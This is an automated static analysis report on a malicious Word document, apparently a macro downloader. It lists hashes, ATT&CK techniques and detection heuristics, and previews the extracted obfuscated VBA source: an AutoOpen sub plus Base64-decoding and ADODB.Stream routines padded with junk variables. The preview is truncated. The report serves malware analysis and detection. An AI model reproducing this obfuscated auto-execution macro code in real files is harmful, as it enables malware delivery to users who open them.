Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66b70cf503d8b5d4…

MALICIOUS

Office (OLE)

Size: 163.0 KB | Created: 2017-05-05 11:43:00 | Authoring application: Microsoft Office Word | First seen: 2017-05-13
MD5: cc2cbde00a288cce758f2d63ed6c93ac
SHA-1: df5b5b8486aeea8a9d8c429697740d9fc39be892
SHA-256: 66b70cf503d8b5d45d0d01a0eddc07ab8a69c297e4b3571572b05c94620b0007
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro uses CreateObject and Shell() to execute a Base64-decoded PowerShell command stager, which points to a downloader or initial execution stage. The combination of the Shell() call and the PowerShell command stager strongly suggests an intent to download and execute further payloads.

Heuristics (9)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • VBA Base64-decoded Shell command stager [critical] (OLE_VBA_BASE64_SHELL_COMMAND_STAGER)
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17206 bytes
SHA-256: 25cda99f1d0da8e79aae1be61bd1c1c26d1f5fc7438cb7d36e1e8e32df705722

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim swJD1aP6 As Boolean
swJD1aP6 = False
Dim lBfdQi As Double
lBfdQi = 62663.258433826
Dim Wa87uf As Boolean
Wa87uf = True
F8dva
End Sub

Attribute VB_Name = "Module2"
Public Function dD3ilQO(ByVal jTfWg)

Dim uu0pN7FDU As Byte
uu0pN7FDU = 113
Dim Xzvd2yBaA As Long
Xzvd2yBaA = -1374405482
Dim h3P6Zb As Single
h3P6Zb = Round(1262.4193239549)
Dim lMiNa4Su
Dim oLIQF2b
Dim U6xgET8 As Integer
U6xgET8 = Sgn(19223)
Dim iHc1oKW5j As Long
iHc1oKW5j = -1493592986
Dim FC1JkWL As Byte
FC1JkWL = 82
Dim tYC3wJ As Integer
tYC3wJ = Sgn(-22457)

Dim MydfL As Integer
MydfL = -21598
Dim G0SbnABF As Long
G0SbnABF = -1929898222
Set lMiNa4Su = CreateObject(xdhpXcO)
Dim wjx93n As Single
wjx93n = Round(34461.076033849)
Dim QDxhwk As Byte
QDxhwk = 212
Dim OQjBbkd As Double
OQjBbkd = Sgn(29356.940918728)
Dim vy98u As Integer
vy98u = 23865
Dim NY03x As Double
NY03x = 11504.587200717
Set oLIQF2b = lMiNa4Su.CreateElement(EpntLR)

Dim kXyjTQ3Z As Byte
kXyjTQ3Z = 170
Dim iNSaL4m As Single
iNSaL4m = 7200.9092840894
Dim NbYD5Md As String
NbYD5Md = vbNullString
Dim QduHA
QduHA = StrConv(H753JO, vbProperCase)
Dim VVEgaZ As Single
VVEgaZ = Sgn(49957.282412604)
With oLIQF2b
Dim B8JS7 As Long
B8JS7 = Sgn(0)
Dim rboz9Q2 As Byte
rboz9Q2 = 252
Dim U0v31Zs As Integer
U0v31Zs = -9722
oLIQF2b.DataType = "bin." & EpntLR
Dim m2CjTOZU As Long
m2CjTOZU = Sgn(0)
Dim e1pqcxfG As Double
e1pqcxfG = Round(879.62519730969)
oLIQF2b.Text = jTfWg
End With

Dim GkAwVy6 As Boolean
GkAwVy6 = True
Dim NtNc4kiPK As Byte
NtNc4kiPK = 137
Dim JV5lb As Long
JV5lb = Sgn(0)
dD3ilQO = MM9AP6(oLIQF2b.nodeTypedValue)
Dim daj2l
daj2l = Len(HTkePM3u)
Dim tLu4H As Integer
tLu4H = 30944
Set oLIQF2b = Nothing
Set lMiNa4Su = Nothing
End Function
Function MM9AP6(Binary)
Dim z8IMRmy As Long
z8IMRmy = Sgn(-970809712)
Dim EN0SAehaD As Single
EN0SAehaD = 46363.8290906
Dim uYvOS6 As Long
uYvOS6 = 0
Const C649c = 2
Const J5JkQwUVM = 1

Dim XHmQSZEk As Byte
XHmQSZEk = 202
Dim uoEb17jua As Boolean
uoEb17jua = True
Dim MR0sldcev As Long
MR0sldcev = Sgn(-929278598)
Dim NJsZjnU

Dim KgJfKDVGs As Byte
KgJfKDVGs = 52
Dim mhv0TFsy As Integer
mhv0TFsy = 24825
Dim X7wmUiO
X7wmUiO = StrConv(jcVvbx3, vbLowerCase)
Dim AaFywq As Byte
AaFywq = 244
Dim N0kTfIy3 As Boolean
N0kTfIy3 = False
Dim WmM0afn1Z As Byte
WmM0afn1Z = 53
Dim PSTpd6G As Long
PSTpd6G = -508499954
Dim Sg4TO0H As String
Sg4TO0H = Val("J")
Set NJsZjnU = CreateObject("adodb.stream")
Dim et3CoV As Long
et3CoV = Sgn(0)
Dim uB7TMZfh As Single
uB7TMZfh = Sgn(44170.589517774)
Dim jtobmUkzA As Double
jtobmUkzA = 63178.085553038
Dim PActslhme As Double
PActslhme = Round(45035.594744317)
With NJsZjnU
Dim klC62ZQf As Double
klC62ZQf = Sgn(14030.460836578)
Dim vy0efUGx As Long
vy0efUGx = Sgn(-1737644752)
Dim StAgI
StAgI = Asc("^")
Dim MA6fPR As String
MA6fPR = vbNullString
.Type = J5JkQwUVM
Dim rWpzVO As Double
rWpzVO = Fix(31693.630577065)
Dim g7ywe0cz As Double
g7ywe0cz = Round(39036.616020474)
.Open
Dim AAhtxa2fF As Single
AAhtxa2fF = Sgn(25611.007985664)
Dim HPO2Deafh
HPO2Deafh = ""
Dim MAMgEJ As Boolean
MAMgEJ = True
Dim tkA28h As Boolean
tkA28h = False
Dim NqXM5fk As Double
NqXM5fk = Sgn(50204.09539515)
.Write Binary
Dim OkzyQm As Long
OkzyQm = Sgn(0)
Dim M4CKa As String
M4CKa = StrConv(vTvcDSCFQ, vbProperCase)
.Position = 0

Dim O3tYkhKsM As Integer
O3tYkhKsM = -27842
Dim gBgZc24F As Single
gBgZc24F = 43034.963077576
.Type = C649c
Dim f2Pcx As Double
f2Pcx = Val(55913.562171349)
Dim yonlON As Boolean
yonlON = True
Dim P1XqQe As Double
P1XqQe = Sgn(29368.821322486)
Dim hB83bq5mK As Byte
hB83bq5mK = 176
Dim t6TRIL21g As Boolean
t6TRIL21g = True
Dim mexRF As Do
... (truncated)